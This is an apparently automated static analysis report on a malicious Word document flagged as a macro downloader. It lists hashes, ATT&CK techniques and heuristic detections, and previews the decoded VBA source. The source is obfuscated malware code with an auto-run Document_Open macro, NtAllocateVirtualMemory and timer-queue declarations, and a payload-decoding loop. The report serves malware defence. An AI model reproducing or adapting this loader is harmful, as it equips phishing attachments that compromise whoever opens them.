Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2d5bfe9cfa79dd9e…

MALICIOUS

Office (OLE)

Size: 307.5 KB
Created: 2018-02-12 14:05:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: d7e39db06ddce5e6a9982b55672a513b
SHA-1: 2e256c733b3824c4ea7743e2e141203f0a400274
SHA-256: 2d5bfe9cfa79dd9ea3b36d7c052b8440d0ea113331b4f7c8f3f41a1b0fa7da52
Risk Score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic also flags it as a downloader. While the specific download URL is not directly present, the presence of macros and the downloader heuristic strongly suggest this attack pattern. No specific family could be identified.

Heuristics (4)

  • ClamAV: Doc.Downloader.Macro-6539595-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9884 bytes
SHA-256: 2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
selfdenial
recommendation = 53 + 3
 Pmt 0, recommendation, 12303, 28962, 2
End Sub



Attribute VB_Name = "nissan"
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function colinus _
Lib "Ntdll  " Alias _
"NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long
#End If
Function deflect(after)
#If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then
Dim estoppel As LongPtr
countywide = 65 - 126 + 69
Dim comburent As LongPtr
Dim hampshire As LongPtr
dipsacus = VarPtr(estoppel)
bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide)
#End If
#If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then
Dim estoppel As Long
countywide = 58 - 23 - 31
Dim comburent As Long
Dim hampshire As Long
dipsacus = VarPtr(estoppel)
bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide)
#End If
comburent = 42 - 112 + 70
hampshire = 18 - 84 + 9905
antipsychotic = 39 - 101 + 4158
booze = 99 - 42 + 7
commelina = colinus(ByVal (91 - 126 + 34), _
comburent, _
ByVal (36 - 66 + 30), hampshire, _
ByVal antipsychotic, _
ByVal booze)
puncuality comburent, estoppel, 38 - 101 + 5946
Pmt 0, (48 + 17), 20068, 10392, 3
deflect = comburent
End Function


Attribute VB_Name = "mustang"
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function colinus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr
#End If
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function rearguard _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long
#End If
Public Function superabat(cancan) As String
Dim bawdyhouse(63) As Long
Dim sundowner(6962) As Byte
Dim chalcedony As Long
Dim samara As Long
Dim embellishment As Long
Dim tightfitting(63) As Long
Dim fixedness(63) As Long
Dim osmanthus() As Byte
Dim wotan As Long
proctology = 11 - 58 + 262191
alongside = 70 - 72 + 257
meanings = 117 - 104 + 243
direction = 20 - 12 + 4088
qualification = 94 - 4 + 65446
cebidae = 103 - 49 + 10
evenhanded = 87 - 98 + 65291
severalty = 33 - 41 + 16711688
Dim hurl() As Byte
hurl = VBA.StrConv(cancan, 120 + 8)
miserere = 1 + 59
Pmt 0, miserere, 26798, 42787, 6
clamp = 7840 + 3
padre = vbKeyShift - 12
For attendance = (3 - 3) To clamp
If attendance Mod 2 = (4 - 4) Then
hurl(attendance) = hurl(attendance) - padre
Else
hurl(attendance) = hurl(attendance) - (padre - 1)
End If
Next attendance
crumenal = 27 + 27
Pmt 0, crumenal, 9696, 24175, 6
backswimmer = stridor
For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47)
fixedness(chalcedony) = insubordinate(chalcedony, direction, 47)
tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47)
Next chalcedony
rosales = 6 + 29
Pmt 0, rosales, 39805, 48993, 7
osmanthus = hurl
arbitrament = 21 + 51
Pmt 0, arbitrament, 9930, 52430, 4
christianity = 101 - 
... (truncated)